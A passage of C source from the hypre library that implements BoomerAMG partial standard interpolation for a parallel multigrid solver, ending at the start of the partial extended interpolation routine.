hypre_BoomerAMGBuildPartialStdInterp(hypre_ParCSRMatrix *A, HYPRE_Int *CF_marker,
hypre_ParCSRMatrix *S, HYPRE_BigInt *num_cpts_global,
HYPRE_BigInt *num_old_cpts_global,
HYPRE_Int num_functions, HYPRE_Int *dof_func, HYPRE_Int debug_flag,
HYPRE_Real trunc_factor, HYPRE_Int max_elmts,
HYPRE_Int sep_weight,
hypre_ParCSRMatrix **P_ptr)
{
/* Communication Variables */
MPI_Comm comm = hypre_ParCSRMatrixComm(A);
hypre_ParCSRCommPkg *comm_pkg = hypre_ParCSRMatrixCommPkg(A);
HYPRE_Int my_id, num_procs;
/* Variables to store input variables */
hypre_CSRMatrix *A_diag = hypre_ParCSRMatrixDiag(A);
HYPRE_Real *A_diag_data = hypre_CSRMatrixData(A_diag);
HYPRE_Int *A_diag_i = hypre_CSRMatrixI(A_diag);
HYPRE_Int *A_diag_j = hypre_CSRMatrixJ(A_diag);
hypre_CSRMatrix *A_offd = hypre_ParCSRMatrixOffd(A);
HYPRE_Real *A_offd_data = hypre_CSRMatrixData(A_offd);
HYPRE_Int *A_offd_i = hypre_CSRMatrixI(A_offd);
HYPRE_Int *A_offd_j = hypre_CSRMatrixJ(A_offd);
/*HYPRE_Int num_cols_A_offd = hypre_CSRMatrixNumCols(A_offd);
HYPRE_Int *col_map_offd = hypre_ParCSRMatrixColMapOffd(A);*/
HYPRE_Int n_fine = hypre_CSRMatrixNumRows(A_diag);
HYPRE_BigInt col_1 = hypre_ParCSRMatrixFirstRowIndex(A);
HYPRE_Int local_numrows = hypre_CSRMatrixNumRows(A_diag);
HYPRE_BigInt col_n = col_1 + (HYPRE_BigInt)local_numrows;
HYPRE_BigInt total_global_cpts, my_first_cpt;
/* Variables to store strong connection matrix info */
hypre_CSRMatrix *S_diag = hypre_ParCSRMatrixDiag(S);
HYPRE_Int *S_diag_i = hypre_CSRMatrixI(S_diag);
HYPRE_Int *S_diag_j = hypre_CSRMatrixJ(S_diag);
hypre_CSRMatrix *S_offd = hypre_ParCSRMatrixOffd(S);
HYPRE_Int *S_offd_i = hypre_CSRMatrixI(S_offd);
HYPRE_Int *S_offd_j = hypre_CSRMatrixJ(S_offd);
/* Interpolation matrix P */
hypre_ParCSRMatrix *P;
hypre_CSRMatrix *P_diag;
hypre_CSRMatrix *P_offd;
HYPRE_Real *P_diag_data = NULL;
HYPRE_Int *P_diag_i, *P_diag_j = NULL;
HYPRE_Real *P_offd_data = NULL;
HYPRE_Int *P_offd_i, *P_offd_j = NULL;
/*HYPRE_Int *col_map_offd_P = NULL;*/
HYPRE_Int P_diag_size;
HYPRE_Int P_offd_size;
HYPRE_Int *P_marker = NULL;
HYPRE_Int *P_marker_offd = NULL;
HYPRE_Int *CF_marker_offd = NULL;
HYPRE_Int *tmp_CF_marker_offd = NULL;
HYPRE_Int *dof_func_offd = NULL;
   /* Full row information for columns of A that are off diag */
hypre_CSRMatrix *A_ext;
HYPRE_Real *A_ext_data;
HYPRE_Int *A_ext_i;
HYPRE_BigInt *A_ext_j;
HYPRE_Int *fine_to_coarse = NULL;
HYPRE_BigInt *fine_to_coarse_offd = NULL;
HYPRE_Int *old_coarse_to_fine = NULL;
HYPRE_Int loc_col;
HYPRE_Int full_off_procNodes;
hypre_CSRMatrix *Sop;
HYPRE_Int *Sop_i;
HYPRE_BigInt *Sop_j;
/* Variables to keep count of interpolatory points */
HYPRE_Int jj_counter, jj_counter_offd;
HYPRE_Int jj_begin_row, jj_end_row;
HYPRE_Int jj_begin_row_offd = 0;
HYPRE_Int jj_end_row_offd = 0;
HYPRE_Int coarse_counter;
HYPRE_Int n_coarse_old;
HYPRE_BigInt total_old_global_cpts;
HYPRE_Int *ihat = NULL;
HYPRE_Int *ihat_offd = NULL;
HYPRE_Int *ipnt = NULL;
HYPRE_Int *ipnt_offd = NULL;
HYPRE_Int strong_f_marker = -2;
/* Interpolation weight variables */
HYPRE_Real *ahat = NULL;
HYPRE_Real *ahat_offd = NULL;
HYPRE_Real sum_pos, sum_pos_C, sum_neg, sum_neg_C, sum, sum_C;
HYPRE_Real diagonal, distribute;
HYPRE_Real alfa, beta;
/* Loop variables */
/*HYPRE_Int index;*/
HYPRE_Int cnt, old_cnt;
HYPRE_Int start_indexing = 0;
HYPRE_Int i, ii, i1, j1, jj, kk, k1;
HYPRE_BigInt big_k1;
HYPRE_Int cnt_c, cnt_f, cnt_c_offd, cnt_f_offd, indx;
/* Definitions */
HYPRE_Real zero = 0.0;
HYPRE_Real one = 1.0;
HYPRE_Real wall_time;
HYPRE_Real wall_1 = 0;
HYPRE_Real wall_2 = 0;
HYPRE_Real wall_3 = 0;
hypre_ParCSRCommPkg *extend_comm_pkg = NULL;
if (debug_flag == 4) { wall_time = time_getWallclockSeconds(); }
/* BEGIN */
hypre_MPI_Comm_size(comm, &num_procs);
hypre_MPI_Comm_rank(comm, &my_id);
my_first_cpt = num_cpts_global[0];
/*my_first_old_cpt = num_old_cpts_global[0];*/
n_coarse_old = (HYPRE_Int)(num_old_cpts_global[1] - num_old_cpts_global[0]);
/*n_coarse = num_cpts_global[1] - num_cpts_global[0];*/
if (my_id == (num_procs - 1))
{
total_global_cpts = num_cpts_global[1];
total_old_global_cpts = num_old_cpts_global[1];
}
hypre_MPI_Bcast(&total_global_cpts, 1, HYPRE_MPI_BIG_INT, num_procs - 1, comm);
hypre_MPI_Bcast(&total_old_global_cpts, 1, HYPRE_MPI_BIG_INT, num_procs - 1, comm);
if (!comm_pkg)
{
hypre_MatvecCommPkgCreate(A);
comm_pkg = hypre_ParCSRMatrixCommPkg(A);
}
   /* Set up off processor information (specifically for neighbors of
    * neighbors) */
full_off_procNodes = 0;
if (num_procs > 1)
{
if (hypre_exchange_interp_data(
&CF_marker_offd, &dof_func_offd, &A_ext, &full_off_procNodes, &Sop, &extend_comm_pkg,
A, CF_marker, S, num_functions, dof_func, 0))
{
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_EXTENDED_I_INTERP] += hypre_MPI_Wtime();
#endif
return hypre_error_flag;
}
A_ext_i = hypre_CSRMatrixI(A_ext);
A_ext_j = hypre_CSRMatrixBigJ(A_ext);
A_ext_data = hypre_CSRMatrixData(A_ext);
Sop_i = hypre_CSRMatrixI(Sop);
Sop_j = hypre_CSRMatrixBigJ(Sop);
}
/*-----------------------------------------------------------------------
* First Pass: Determine size of P and fill in fine_to_coarse mapping.
*-----------------------------------------------------------------------*/
/*-----------------------------------------------------------------------
    * Initialize counters and allocate mapping vector.
*-----------------------------------------------------------------------*/
P_diag_i = hypre_CTAlloc(HYPRE_Int, n_coarse_old + 1, HYPRE_MEMORY_HOST);
P_offd_i = hypre_CTAlloc(HYPRE_Int, n_coarse_old + 1, HYPRE_MEMORY_HOST);
if (n_fine)
{
old_coarse_to_fine = hypre_CTAlloc(HYPRE_Int, n_coarse_old, HYPRE_MEMORY_HOST);
fine_to_coarse = hypre_CTAlloc(HYPRE_Int, n_fine, HYPRE_MEMORY_HOST);
P_marker = hypre_CTAlloc(HYPRE_Int, n_fine, HYPRE_MEMORY_HOST);
}
if (full_off_procNodes)
{
P_marker_offd = hypre_CTAlloc(HYPRE_Int, full_off_procNodes, HYPRE_MEMORY_HOST);
fine_to_coarse_offd = hypre_CTAlloc(HYPRE_BigInt, full_off_procNodes, HYPRE_MEMORY_HOST);
tmp_CF_marker_offd = hypre_CTAlloc(HYPRE_Int, full_off_procNodes, HYPRE_MEMORY_HOST);
}
hypre_initialize_vecs(n_fine, full_off_procNodes, fine_to_coarse,
fine_to_coarse_offd, P_marker, P_marker_offd,
tmp_CF_marker_offd);
jj_counter = start_indexing;
jj_counter_offd = start_indexing;
coarse_counter = 0;
cnt = 0;
old_cnt = 0;
for (i = 0; i < n_fine; i++)
{
fine_to_coarse[i] = -1;
if (CF_marker[i] == 1)
{
fine_to_coarse[i] = cnt++;
old_coarse_to_fine[old_cnt++] = i;
}
else if (CF_marker[i] == -2)
{
old_coarse_to_fine[old_cnt++] = i;
}
}
/*-----------------------------------------------------------------------
* Loop over fine grid.
*-----------------------------------------------------------------------*/
for (ii = 0; ii < n_coarse_old; ii++)
{
P_diag_i[ii] = jj_counter;
if (num_procs > 1)
{
P_offd_i[ii] = jj_counter_offd;
}
i = old_coarse_to_fine[ii];
if (CF_marker[i] > 0)
{
jj_counter++;
coarse_counter++;
}
/*--------------------------------------------------------------------
* If i is an F-point, interpolation is from the C-points that
       * strongly influence i, or C-points that strongly influence F-points
* that strongly influence i.
*--------------------------------------------------------------------*/
else if (CF_marker[i] == -2)
{
for (jj = S_diag_i[i]; jj < S_diag_i[i + 1]; jj++)
{
i1 = S_diag_j[jj];
if (CF_marker[i1] > 0)
{
/* i1 is a C point */
if (P_marker[i1] < P_diag_i[ii])
{
P_marker[i1] = jj_counter;
jj_counter++;
}
}
else if (CF_marker[i1] != -3)
{
               /* i1 is an F point, loop through its strong neighbors */
for (kk = S_diag_i[i1]; kk < S_diag_i[i1 + 1]; kk++)
{
k1 = S_diag_j[kk];
if (CF_marker[k1] > 0)
{
if (P_marker[k1] < P_diag_i[ii])
{
P_marker[k1] = jj_counter;
jj_counter++;
}
}
}
if (num_procs > 1)
{
for (kk = S_offd_i[i1]; kk < S_offd_i[i1 + 1]; kk++)
{
k1 = S_offd_j[kk];
if (CF_marker_offd[k1] > 0)
{
if (P_marker_offd[k1] < P_offd_i[ii])
{
tmp_CF_marker_offd[k1] = 1;
P_marker_offd[k1] = jj_counter_offd;
jj_counter_offd++;
}
}
}
}
}
}
/* Look at off diag strong connections of i */
if (num_procs > 1)
{
for (jj = S_offd_i[i]; jj < S_offd_i[i + 1]; jj++)
{
i1 = S_offd_j[jj];
if (CF_marker_offd[i1] > 0)
{
if (P_marker_offd[i1] < P_offd_i[ii])
{
tmp_CF_marker_offd[i1] = 1;
P_marker_offd[i1] = jj_counter_offd;
jj_counter_offd++;
}
}
else if (CF_marker_offd[i1] != -3)
{
/* F point; look at neighbors of i1. Sop contains global col
* numbers and entries that could be in S_diag or S_offd or
* neither. */
for (kk = Sop_i[i1]; kk < Sop_i[i1 + 1]; kk++)
{
big_k1 = Sop_j[kk];
if (big_k1 >= col_1 && big_k1 < col_n)
{
/* In S_diag */
loc_col = (HYPRE_Int)(big_k1 - col_1);
if (CF_marker[loc_col] >= 0)
{
if (P_marker[loc_col] < P_diag_i[ii])
{
P_marker[loc_col] = jj_counter;
jj_counter++;
}
}
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (CF_marker_offd[loc_col] >= 0)
{
if (P_marker_offd[loc_col] < P_offd_i[ii])
{
P_marker_offd[loc_col] = jj_counter_offd;
tmp_CF_marker_offd[loc_col] = 1;
jj_counter_offd++;
}
}
}
}
}
}
}
}
}
if (debug_flag == 4)
{
wall_time = time_getWallclockSeconds() - wall_time;
hypre_printf("Proc = %d determine structure %f\n",
my_id, wall_time);
fflush(NULL);
}
/*-----------------------------------------------------------------------
* Allocate arrays.
*-----------------------------------------------------------------------*/
P_diag_size = jj_counter;
P_offd_size = jj_counter_offd;
if (P_diag_size)
{
P_diag_j = hypre_CTAlloc(HYPRE_Int, P_diag_size, HYPRE_MEMORY_HOST);
P_diag_data = hypre_CTAlloc(HYPRE_Real, P_diag_size, HYPRE_MEMORY_HOST);
}
if (P_offd_size)
{
P_offd_j = hypre_CTAlloc(HYPRE_Int, P_offd_size, HYPRE_MEMORY_HOST);
P_offd_data = hypre_CTAlloc(HYPRE_Real, P_offd_size, HYPRE_MEMORY_HOST);
}
P_diag_i[n_coarse_old] = jj_counter;
P_offd_i[n_coarse_old] = jj_counter_offd;
jj_counter = start_indexing;
jj_counter_offd = start_indexing;
/* Fine to coarse mapping */
if (num_procs > 1)
{
hypre_big_insert_new_nodes(comm_pkg, extend_comm_pkg, fine_to_coarse,
full_off_procNodes, my_first_cpt,
fine_to_coarse_offd);
}
   /* Initialize ahat, which is a modified row of A used in the standard
    * interpolation routine; ihat maps a fine-grid index to its slot in the
    * compressed ahat workspace and ipnt records the inverse mapping so the
    * workspace can be reset cheaply after each row. */
if (n_fine)
{
ahat = hypre_CTAlloc(HYPRE_Real, n_fine, HYPRE_MEMORY_HOST);
ihat = hypre_CTAlloc(HYPRE_Int, n_fine, HYPRE_MEMORY_HOST);
ipnt = hypre_CTAlloc(HYPRE_Int, n_fine, HYPRE_MEMORY_HOST);
}
if (full_off_procNodes)
{
ahat_offd = hypre_CTAlloc(HYPRE_Real, full_off_procNodes, HYPRE_MEMORY_HOST);
ihat_offd = hypre_CTAlloc(HYPRE_Int, full_off_procNodes, HYPRE_MEMORY_HOST);
ipnt_offd = hypre_CTAlloc(HYPRE_Int, full_off_procNodes, HYPRE_MEMORY_HOST);
}
for (i = 0; i < n_fine; i++)
{
P_marker[i] = -1;
ahat[i] = 0;
ihat[i] = -1;
}
for (i = 0; i < full_off_procNodes; i++)
{
P_marker_offd[i] = -1;
ahat_offd[i] = 0;
ihat_offd[i] = -1;
}
/*-----------------------------------------------------------------------
* Loop over fine grid points.
*-----------------------------------------------------------------------*/
for (ii = 0; ii < n_coarse_old; ii++)
{
jj_begin_row = jj_counter;
jj_begin_row_offd = jj_counter_offd;
i = old_coarse_to_fine[ii];
/*--------------------------------------------------------------------
* If i is a c-point, interpolation is the identity.
*--------------------------------------------------------------------*/
if (CF_marker[i] > 0)
{
P_diag_j[jj_counter] = fine_to_coarse[i];
P_diag_data[jj_counter] = one;
jj_counter++;
}
/*--------------------------------------------------------------------
* If i is an F-point, build interpolation.
*--------------------------------------------------------------------*/
else if (CF_marker[i] == -2)
{
if (debug_flag == 4) { wall_time = time_getWallclockSeconds(); }
strong_f_marker--;
for (jj = S_diag_i[i]; jj < S_diag_i[i + 1]; jj++)
{
i1 = S_diag_j[jj];
/*--------------------------------------------------------------
* If neighbor i1 is a C-point, set column number in P_diag_j
* and initialize interpolation weight to zero.
*--------------------------------------------------------------*/
if (CF_marker[i1] > 0)
{
if (P_marker[i1] < jj_begin_row)
{
P_marker[i1] = jj_counter;
P_diag_j[jj_counter] = i1;
P_diag_data[jj_counter] = zero;
jj_counter++;
}
}
else if (CF_marker[i1] != -3)
{
P_marker[i1] = strong_f_marker;
for (kk = S_diag_i[i1]; kk < S_diag_i[i1 + 1]; kk++)
{
k1 = S_diag_j[kk];
if (CF_marker[k1] > 0)
{
if (P_marker[k1] < jj_begin_row)
{
P_marker[k1] = jj_counter;
P_diag_j[jj_counter] = k1;
P_diag_data[jj_counter] = zero;
jj_counter++;
}
}
}
if (num_procs > 1)
{
for (kk = S_offd_i[i1]; kk < S_offd_i[i1 + 1]; kk++)
{
k1 = S_offd_j[kk];
if (CF_marker_offd[k1] > 0)
{
if (P_marker_offd[k1] < jj_begin_row_offd)
{
P_marker_offd[k1] = jj_counter_offd;
P_offd_j[jj_counter_offd] = k1;
P_offd_data[jj_counter_offd] = zero;
jj_counter_offd++;
}
}
}
}
}
}
if ( num_procs > 1)
{
for (jj = S_offd_i[i]; jj < S_offd_i[i + 1]; jj++)
{
i1 = S_offd_j[jj];
if ( CF_marker_offd[i1] > 0)
{
if (P_marker_offd[i1] < jj_begin_row_offd)
{
P_marker_offd[i1] = jj_counter_offd;
P_offd_j[jj_counter_offd] = i1;
P_offd_data[jj_counter_offd] = zero;
jj_counter_offd++;
}
}
else if (CF_marker_offd[i1] != -3)
{
P_marker_offd[i1] = strong_f_marker;
for (kk = Sop_i[i1]; kk < Sop_i[i1 + 1]; kk++)
{
big_k1 = Sop_j[kk];
if (big_k1 >= col_1 && big_k1 < col_n)
{
loc_col = (HYPRE_Int)(big_k1 - col_1);
if (CF_marker[loc_col] > 0)
{
if (P_marker[loc_col] < jj_begin_row)
{
P_marker[loc_col] = jj_counter;
P_diag_j[jj_counter] = loc_col;
P_diag_data[jj_counter] = zero;
jj_counter++;
}
}
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (CF_marker_offd[loc_col] > 0)
{
if (P_marker_offd[loc_col] < jj_begin_row_offd)
{
P_marker_offd[loc_col] = jj_counter_offd;
P_offd_j[jj_counter_offd] = loc_col;
P_offd_data[jj_counter_offd] = zero;
jj_counter_offd++;
}
}
}
}
}
}
}
jj_end_row = jj_counter;
jj_end_row_offd = jj_counter_offd;
if (debug_flag == 4)
{
wall_time = time_getWallclockSeconds() - wall_time;
wall_1 += wall_time;
fflush(NULL);
}
if (debug_flag == 4) { wall_time = time_getWallclockSeconds(); }
cnt_c = 0;
cnt_f = jj_end_row - jj_begin_row;
cnt_c_offd = 0;
cnt_f_offd = jj_end_row_offd - jj_begin_row_offd;
ihat[i] = cnt_f;
ipnt[cnt_f] = i;
ahat[cnt_f++] = A_diag_data[A_diag_i[i]];
for (jj = A_diag_i[i] + 1; jj < A_diag_i[i + 1]; jj++)
{
/* i1 is direct neighbor */
i1 = A_diag_j[jj];
if (P_marker[i1] != strong_f_marker)
{
indx = ihat[i1];
if (indx > -1)
{
ahat[indx] += A_diag_data[jj];
}
else if (P_marker[i1] >= jj_begin_row)
{
ihat[i1] = cnt_c;
ipnt[cnt_c] = i1;
ahat[cnt_c++] += A_diag_data[jj];
}
else if (CF_marker[i1] != -3)
{
ihat[i1] = cnt_f;
ipnt[cnt_f] = i1;
ahat[cnt_f++] += A_diag_data[jj];
}
}
else
{
if (num_functions == 1 || dof_func[i] == dof_func[i1])
{
distribute = A_diag_data[jj] / A_diag_data[A_diag_i[i1]];
for (kk = A_diag_i[i1] + 1; kk < A_diag_i[i1 + 1]; kk++)
{
k1 = A_diag_j[kk];
indx = ihat[k1];
if (indx > -1)
{
ahat[indx] -= A_diag_data[kk] * distribute;
}
else if (P_marker[k1] >= jj_begin_row)
{
ihat[k1] = cnt_c;
ipnt[cnt_c] = k1;
ahat[cnt_c++] -= A_diag_data[kk] * distribute;
}
else
{
ihat[k1] = cnt_f;
ipnt[cnt_f] = k1;
ahat[cnt_f++] -= A_diag_data[kk] * distribute;
}
}
if (num_procs > 1)
{
for (kk = A_offd_i[i1]; kk < A_offd_i[i1 + 1]; kk++)
{
k1 = A_offd_j[kk];
indx = ihat_offd[k1];
if (num_functions == 1 || dof_func[i1] == dof_func_offd[k1])
{
if (indx > -1)
{
ahat_offd[indx] -= A_offd_data[kk] * distribute;
}
else if (P_marker_offd[k1] >= jj_begin_row_offd)
{
ihat_offd[k1] = cnt_c_offd;
ipnt_offd[cnt_c_offd] = k1;
ahat_offd[cnt_c_offd++] -= A_offd_data[kk] * distribute;
}
else
{
ihat_offd[k1] = cnt_f_offd;
ipnt_offd[cnt_f_offd] = k1;
ahat_offd[cnt_f_offd++] -= A_offd_data[kk] * distribute;
}
}
}
}
}
}
}
if (num_procs > 1)
{
for (jj = A_offd_i[i]; jj < A_offd_i[i + 1]; jj++)
{
i1 = A_offd_j[jj];
if (P_marker_offd[i1] != strong_f_marker)
{
indx = ihat_offd[i1];
if (indx > -1)
{
ahat_offd[indx] += A_offd_data[jj];
}
else if (P_marker_offd[i1] >= jj_begin_row_offd)
{
ihat_offd[i1] = cnt_c_offd;
ipnt_offd[cnt_c_offd] = i1;
ahat_offd[cnt_c_offd++] += A_offd_data[jj];
}
else if (CF_marker_offd[i1] != -3)
{
ihat_offd[i1] = cnt_f_offd;
ipnt_offd[cnt_f_offd] = i1;
ahat_offd[cnt_f_offd++] += A_offd_data[jj];
}
}
else
{
if (num_functions == 1 || dof_func[i] == dof_func_offd[i1])
{
distribute = A_offd_data[jj] / A_ext_data[A_ext_i[i1]];
for (kk = A_ext_i[i1] + 1; kk < A_ext_i[i1 + 1]; kk++)
{
big_k1 = A_ext_j[kk];
if (big_k1 >= col_1 && big_k1 < col_n)
{
/*diag*/
loc_col = (HYPRE_Int)(big_k1 - col_1);
indx = ihat[loc_col];
if (indx > -1)
{
ahat[indx] -= A_ext_data[kk] * distribute;
}
else if (P_marker[loc_col] >= jj_begin_row)
{
ihat[loc_col] = cnt_c;
ipnt[cnt_c] = loc_col;
ahat[cnt_c++] -= A_ext_data[kk] * distribute;
}
else
{
ihat[loc_col] = cnt_f;
ipnt[cnt_f] = loc_col;
ahat[cnt_f++] -= A_ext_data[kk] * distribute;
}
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (num_functions == 1 ||
dof_func_offd[loc_col] == dof_func_offd[i1])
{
indx = ihat_offd[loc_col];
if (indx > -1)
{
ahat_offd[indx] -= A_ext_data[kk] * distribute;
}
else if (P_marker_offd[loc_col] >= jj_begin_row_offd)
{
ihat_offd[loc_col] = cnt_c_offd;
ipnt_offd[cnt_c_offd] = loc_col;
ahat_offd[cnt_c_offd++] -= A_ext_data[kk] * distribute;
}
else
{
ihat_offd[loc_col] = cnt_f_offd;
ipnt_offd[cnt_f_offd] = loc_col;
ahat_offd[cnt_f_offd++] -= A_ext_data[kk] * distribute;
}
}
}
}
}
}
}
}
if (debug_flag == 4)
{
wall_time = time_getWallclockSeconds() - wall_time;
wall_2 += wall_time;
fflush(NULL);
}
if (debug_flag == 4) { wall_time = time_getWallclockSeconds(); }
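      /* ahat slots [0, cnt_c) hold C-point contributions and the diagonal was
       * stored at the first F slot; the code relies on every C point of the
       * row pattern having been visited, so cnt_c now indexes that slot. */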
diagonal = ahat[cnt_c];
ahat[cnt_c] = 0;
sum_pos = 0;
sum_pos_C = 0;
sum_neg = 0;
sum_neg_C = 0;
sum = 0;
sum_C = 0;
if (sep_weight == 1)
{
for (jj = 0; jj < cnt_c; jj++)
{
if (ahat[jj] > 0)
{
sum_pos_C += ahat[jj];
}
else
{
sum_neg_C += ahat[jj];
}
}
if (num_procs > 1)
{
for (jj = 0; jj < cnt_c_offd; jj++)
{
if (ahat_offd[jj] > 0)
{
sum_pos_C += ahat_offd[jj];
}
else
{
sum_neg_C += ahat_offd[jj];
}
}
}
sum_pos = sum_pos_C;
sum_neg = sum_neg_C;
for (jj = cnt_c + 1; jj < cnt_f; jj++)
{
if (ahat[jj] > 0)
{
sum_pos += ahat[jj];
}
else
{
sum_neg += ahat[jj];
}
ahat[jj] = 0;
}
if (num_procs > 1)
{
for (jj = cnt_c_offd; jj < cnt_f_offd; jj++)
{
if (ahat_offd[jj] > 0)
{
sum_pos += ahat_offd[jj];
}
else
{
sum_neg += ahat_offd[jj];
}
ahat_offd[jj] = 0;
}
}
if (sum_neg_C * diagonal != 0.0) { alfa = sum_neg / sum_neg_C / diagonal; }
if (sum_pos_C * diagonal != 0.0) { beta = sum_pos / sum_pos_C / diagonal; }
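      /* alfa and beta are the distribution factors of the standard formula:
       * the negative (resp. positive) F-weight mass sum_neg (sum_pos) is
       * spread over the negative (positive) C entries, scaled by the
       * diagonal. */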
/*-----------------------------------------------------------------
* Set interpolation weight by dividing by the diagonal.
*-----------------------------------------------------------------*/
for (jj = jj_begin_row; jj < jj_end_row; jj++)
{
j1 = ihat[P_diag_j[jj]];
if (ahat[j1] > 0)
{
P_diag_data[jj] = -beta * ahat[j1];
}
else
{
P_diag_data[jj] = -alfa * ahat[j1];
}
P_diag_j[jj] = fine_to_coarse[P_diag_j[jj]];
ahat[j1] = 0;
}
for (jj = 0; jj < cnt_f; jj++)
{
ihat[ipnt[jj]] = -1;
}
if (num_procs > 1)
{
for (jj = jj_begin_row_offd; jj < jj_end_row_offd; jj++)
{
j1 = ihat_offd[P_offd_j[jj]];
if (ahat_offd[j1] > 0)
{
P_offd_data[jj] = -beta * ahat_offd[j1];
}
else
{
P_offd_data[jj] = -alfa * ahat_offd[j1];
}
ahat_offd[j1] = 0;
}
for (jj = 0; jj < cnt_f_offd; jj++)
{
ihat_offd[ipnt_offd[jj]] = -1;
}
}
}
else
{
for (jj = 0; jj < cnt_c; jj++)
{
sum_C += ahat[jj];
}
if (num_procs > 1)
{
for (jj = 0; jj < cnt_c_offd; jj++)
{
sum_C += ahat_offd[jj];
}
}
sum = sum_C;
for (jj = cnt_c + 1; jj < cnt_f; jj++)
{
sum += ahat[jj];
ahat[jj] = 0;
}
if (num_procs > 1)
{
for (jj = cnt_c_offd; jj < cnt_f_offd; jj++)
{
sum += ahat_offd[jj];
ahat_offd[jj] = 0;
}
}
if (sum_C * diagonal != 0.0) { alfa = sum / sum_C / diagonal; }
/*-----------------------------------------------------------------
* Set interpolation weight by dividing by the diagonal.
*-----------------------------------------------------------------*/
for (jj = jj_begin_row; jj < jj_end_row; jj++)
{
j1 = ihat[P_diag_j[jj]];
P_diag_data[jj] = -alfa * ahat[j1];
P_diag_j[jj] = fine_to_coarse[P_diag_j[jj]];
ahat[j1] = 0;
}
for (jj = 0; jj < cnt_f; jj++)
{
ihat[ipnt[jj]] = -1;
}
if (num_procs > 1)
{
for (jj = jj_begin_row_offd; jj < jj_end_row_offd; jj++)
{
j1 = ihat_offd[P_offd_j[jj]];
P_offd_data[jj] = -alfa * ahat_offd[j1];
ahat_offd[j1] = 0;
}
for (jj = 0; jj < cnt_f_offd; jj++)
{
ihat_offd[ipnt_offd[jj]] = -1;
}
}
}
if (debug_flag == 4)
{
wall_time = time_getWallclockSeconds() - wall_time;
wall_3 += wall_time;
fflush(NULL);
}
}
}
if (debug_flag == 4)
{
hypre_printf("Proc = %d fill part 1 %f part 2 %f part 3 %f\n",
my_id, wall_1, wall_2, wall_3);
fflush(NULL);
}
P = hypre_ParCSRMatrixCreate(comm,
total_old_global_cpts,
total_global_cpts,
num_old_cpts_global,
num_cpts_global,
0,
P_diag_i[n_coarse_old],
P_offd_i[n_coarse_old]);
P_diag = hypre_ParCSRMatrixDiag(P);
hypre_CSRMatrixData(P_diag) = P_diag_data;
hypre_CSRMatrixI(P_diag) = P_diag_i;
hypre_CSRMatrixJ(P_diag) = P_diag_j;
P_offd = hypre_ParCSRMatrixOffd(P);
hypre_CSRMatrixData(P_offd) = P_offd_data;
hypre_CSRMatrixI(P_offd) = P_offd_i;
hypre_CSRMatrixJ(P_offd) = P_offd_j;
hypre_CSRMatrixMemoryLocation(P_diag) = HYPRE_MEMORY_HOST;
hypre_CSRMatrixMemoryLocation(P_offd) = HYPRE_MEMORY_HOST;
/* Compress P, removing coefficients smaller than trunc_factor * Max */
if (trunc_factor != 0.0 || max_elmts > 0)
{
hypre_BoomerAMGInterpTruncation(P, trunc_factor, max_elmts);
P_diag_data = hypre_CSRMatrixData(P_diag);
P_diag_i = hypre_CSRMatrixI(P_diag);
P_diag_j = hypre_CSRMatrixJ(P_diag);
P_offd_data = hypre_CSRMatrixData(P_offd);
P_offd_i = hypre_CSRMatrixI(P_offd);
P_offd_j = hypre_CSRMatrixJ(P_offd);
P_diag_size = P_diag_i[n_coarse_old];
P_offd_size = P_offd_i[n_coarse_old];
}
/* This builds col_map, col_map should be monotone increasing and contain
* global numbers. */
if (P_offd_size)
{
hypre_build_interp_colmap(P, full_off_procNodes, tmp_CF_marker_offd, fine_to_coarse_offd);
}
hypre_MatvecCommPkgCreate(P);
for (i = 0; i < n_fine; i++)
if (CF_marker[i] < -1) { CF_marker[i] = -1; }
*P_ptr = P;
/* Deallocate memory */
hypre_TFree(fine_to_coarse, HYPRE_MEMORY_HOST);
hypre_TFree(old_coarse_to_fine, HYPRE_MEMORY_HOST);
hypre_TFree(P_marker, HYPRE_MEMORY_HOST);
hypre_TFree(ahat, HYPRE_MEMORY_HOST);
hypre_TFree(ihat, HYPRE_MEMORY_HOST);
hypre_TFree(ipnt, HYPRE_MEMORY_HOST);
if (full_off_procNodes)
{
hypre_TFree(ahat_offd, HYPRE_MEMORY_HOST);
hypre_TFree(ihat_offd, HYPRE_MEMORY_HOST);
hypre_TFree(ipnt_offd, HYPRE_MEMORY_HOST);
}
if (num_procs > 1)
{
hypre_CSRMatrixDestroy(Sop);
hypre_CSRMatrixDestroy(A_ext);
hypre_TFree(fine_to_coarse_offd, HYPRE_MEMORY_HOST);
hypre_TFree(P_marker_offd, HYPRE_MEMORY_HOST);
hypre_TFree(CF_marker_offd, HYPRE_MEMORY_HOST);
hypre_TFree(tmp_CF_marker_offd, HYPRE_MEMORY_HOST);
if (num_functions > 1)
{
hypre_TFree(dof_func_offd, HYPRE_MEMORY_HOST);
}
hypre_MatvecCommPkgDestroy(extend_comm_pkg);
}
return hypre_error_flag;
}
/*---------------------------------------------------------------------------
* hypre_BoomerAMGBuildPartialExtInterp
* Comment:
*--------------------------------------------------------------------------*/
HYPRE_Int
hypre_BoomerAMGBuildPartialExtInterp(hypre_ParCSRMatrix *A, HYPRE_Int *CF_marker,
hypre_ParCSRMatrix *S, HYPRE_BigInt *num_cpts_global,
HYPRE_BigInt *num_old_cpts_global,
HYPRE_Int num_functions, HYPRE_Int *dof_func, HYPRE_Int debug_flag,
HYPRE_Real trunc_factor, HYPRE_Int max_elmts,
hypre_ParCSRMatrix **P_ptr)
{
/* Communication Variables */
MPI_Comm comm = hypre_ParCSRMatrixComm(A);
hypre_ParCSRCommPkg *comm_pkg = hypre_ParCSRMatrixCommPkg(A);
HYPRE_Int my_id, num_procs;
/* Variables to store input variables */
hypre_CSRMatrix *A_diag = hypre_ParCSRMatrixDiag(A);
HYPRE_Real *A_diag_data = hypre_CSRMatrixData(A_diag);
HYPRE_Int *A_diag_i = hypre_CSRMatrixI(A_diag);
HYPRE_Int *A_diag_j = hypre_CSRMatrixJ(A_diag);
hypre_CSRMatrix *A_offd = hypre_ParCSRMatrixOffd(A);
HYPRE_Real *A_offd_data = hypre_CSRMatrixData(A_offd);
HYPRE_Int *A_offd_i = hypre_CSRMatrixI(A_offd);
HYPRE_Int *A_offd_j = hypre_CSRMatrixJ(A_offd);
/*HYPRE_Int num_cols_A_offd = hypre_CSRMatrixNumCols(A_offd);
HYPRE_Int *col_map_offd = hypre_ParCSRMatrixColMapOffd(A);*/
HYPRE_Int n_fine = hypre_CSRMatrixNumRows(A_diag);
